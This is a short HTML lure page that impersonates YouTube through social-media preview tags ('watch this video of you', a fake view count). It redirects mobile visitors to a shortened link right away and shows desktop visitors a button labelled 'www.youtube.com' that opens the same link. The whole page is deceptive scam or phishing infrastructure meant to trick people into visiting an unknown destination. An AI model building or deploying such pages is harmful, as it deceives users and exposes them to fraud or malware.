
<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta property="og:title" content="watch this video of you ðŸ˜±" />
<meta property="og:description" content="4.043.882 Views" />
<meta property="og:url"                content="https://www.youtube.com" />
</head>
<body>
<style>
.button {
    background-color: #4CAF50;
    border: none;
    color: white;
    padding: 35px 62px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 20px;
    margin: 4px 2px;
    cursor: pointer;
}
</style>
<p id="demo">

</p>
<script type="text/javascript">

function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }

function getUrlVars() {
    var vars = {};
    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
        vars[key] = value;
    });
    return vars;
}
var id = getUrlVars()["id"];
var name = getUrlVars()["name"];
function visitPage(){
        window.location = "http://po.st/XsNJHs";
    }

        if (screen.width <= 720) {
        window.location = "http://po.st/XsNJHs";
    } else {
       document.getElementById("demo").innerHTML ="<h1><button class=button onclick=visitPage();> www.youtube.com </button></h1>"
    }

</script>
</body>
</html>